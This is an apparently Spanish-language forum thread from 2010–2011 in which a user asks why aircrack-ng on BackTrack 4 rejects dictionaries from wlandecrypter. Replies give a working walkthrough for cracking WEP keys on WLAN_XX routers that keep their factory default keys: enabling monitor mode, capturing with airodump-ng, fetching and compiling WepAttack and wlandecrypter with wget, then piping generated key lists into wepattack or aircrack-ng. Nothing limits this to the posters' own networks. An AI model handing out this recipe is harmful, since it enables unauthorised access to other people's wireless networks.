Ver la versión completa : backtrack 4 y wlandecrypter no rulan
larpeiro
06-09-2010, 10:00 AM
Hola,
Estoy probando backtrack 4 y tengo dudas sobre el funcionamiento de aircrack-ng con diccionarios generados por wlandecrypter o jazzteldecrypter, ya que al correr aircrack-ng 1.0 r1645 no detecta el diccionario e indica que el fichero cap tiene que tener mas de 5000 ivs, cuando con el wlandecrypter el diccionario genenado solo se necesitan 4 ivs por ejemplo en wifislax, por ejemplo genero un cap de 200 ivs sin ataque especifico simplemente airodump-ng --ch x --bssid xx:xx:xx:xx:xx:xx --w file.cap
Tras generar el cap, genero con wlandecrypter el dicionario en base al bssid.
wlandecrypter xx:xx:xx:xx:xx:xx essid nombre diccionario
tras generar diccionario ejecuto aircrack-ng con la siguiente sintaxis.
aircrack-ng -b xx:xx:xx:xx:xx:xx file.cap -w diccionario
tras unos segundos sale mensaje "try 5000 ivs".
No se si estoy haciendo algo mal, a lo mejor algún parametro de aircrack-ng pero es como si no reconociense el dicionario generado por wlandecrypter, tambien lo he probado con jazzteldecrypter y sucede lo mismo.
Si alguien le ha sucedido lo mismo o tiene alguna idea para solventarlo, espero vuestros comentarios.
Gracias, saludos.
RocKHounD
01-01-2011, 06:49 AM
Pues pueden pasarte dos cosas.
La primera es que no tengas ninguno de esos dos programas instalados en BT4 ya que no vienen por defecto.
Lo segundo es que las claves que intentas sacar no sean por defecto, ergo, te toca ir buscando de 35k en adelante para un ataque sin diccionario.
lo haces mal un ejemplo solo 4 datas o 1 si esta tela dara
Código:
airodump-ng wlan0 o mon0
airodump-ng --bssid 00:11:22:33:44:55 -w lan wlan0 o mon0
---------------otra consola-------------------
aircrack-ng -w diccionario lan-01.cap
y tiene queir salu2
si tienes problemas con estos comandos lo intentaremos con estos otros wlandecrypter ESSID WLAN_XX | wepattack -f *.cap
porsupuesto instalaremos wepattack solo nesesitaras 1data y listo clientes asocidos siempre con wlandecrypter
solo para wlanxx salu2
Hola,
Estoy probando backtrack 4 y tengo dudas sobre el funcionamiento de aircrack-ng con diccionarios generados por wlandecrypter o jazzteldecrypter, ya que al correr aircrack-ng 1.0 r1645 no detecta el diccionario e indica que el fichero cap tiene que tener mas de 5000 ivs, cuando con el wlandecrypter el diccionario genenado solo se necesitan 4 ivs por ejemplo en wifislax, por ejemplo genero un cap de 200 ivs sin ataque especifico simplemente airodump-ng --ch x --bssid xx:xx:xx:xx:xx:xx --w file.cap
Tras generar el cap, genero con wlandecrypter el dicionario en base al bssid.
wlandecrypter xx:xx:xx:xx:xx:xx essid nombre diccionario
tras generar diccionario ejecuto aircrack-ng con la siguiente sintaxis.
aircrack-ng -b xx:xx:xx:xx:xx:xx file.cap -w diccionario
tras unos segundos sale mensaje "try 5000 ivs".
No se si estoy haciendo algo mal, a lo mejor algún parametro de aircrack-ng pero es como si no reconociense el dicionario generado por wlandecrypter, tambien lo he probado con jazzteldecrypter y sucede lo mismo.
Si alguien le ha sucedido lo mismo o tiene alguna idea para solventarlo, espero vuestros comentarios.
Gracias, saludos.
aver por si no lo tienes vete metiendo esto en la consola de backtrack compi
sudo apt-get install libssl-dev
sudo apt-get install zlib1g zlib1g-dev
sudo apt-get update
esto nos hara falta
wget http://dl.dropbox.com/u/1466770/WepAttack-0.1.3.zip
unzip WepAttack-0.1.3.zip
cd WepAttack-0.1.3
cd src
sudo make
sudo make install
ahora el wlandecrypter
wget -c http://www.wifiway.org/archivos/wlandecrypter-1.1.tar.gz
tar zxvf wlandecrypter-1.1.tar.gz
cd wlandecrypter-1.1/
sudo make clean && make && make install
alo mejor lo tienes que descomprimir tu bueno seguimos
para usarlo
sudo airmon-ng stop wlan0
sudo ifconfig wlan0 down
sudo airmon-ng start wlan0
sudo airodump-ng -w 0 mon0
cuando tengas una data para la consola con algun cliente asociado LA PARA y le pones :
wlandecrypter ESSID WLAN_XX | wepattack -f *.cap y listo
ejemplo: wlandecrypter 33:5e:te:83:00:ss:83 wlan_e9 -f *.cap
el wlandecrypter lo uso asi otra manera : 1 data 4 como mucho
WLANDECRYPTER-------------------------------------
Código:
airodump-ng wlan0 0 mon0
airodump-ng --bssid 00:11:22:33:44:55 –w lan wlan0 0 mon0
---------------otra consola-------------------
aircrack-ng –w diccionario lan-01.cap
RocKHounD
01-06-2011, 06:41 PM
Tiene el diccionario correctamente creado y lo lanza bien en aircrack, si no obtiene la clave sencillamente es porque el router no tiene la clave por defecto.
Ha sido cambiada por el propietario.
Tiene el diccionario correctamente creado y lo lanza bien en aircrack, si no obtiene la clave sencillamente es porque el router no tiene la clave por defecto.
Ha sido cambiada por el propietario.
no encontrava este post bueno yo lo saque de aqui ..........tienes razon si noesta no tela dara
Manual Wifislax, Wifiway Avanzado WEP y WPA Rockeropasiempre, Heavyloto y Zydas. (http://foro.elhacker.net/wireless_en_linux/manual_wifislax_wifiway_avanzado_wep_y_wpa_rockero pasiempre_heavyloto_y_zydas-t261907.0.html)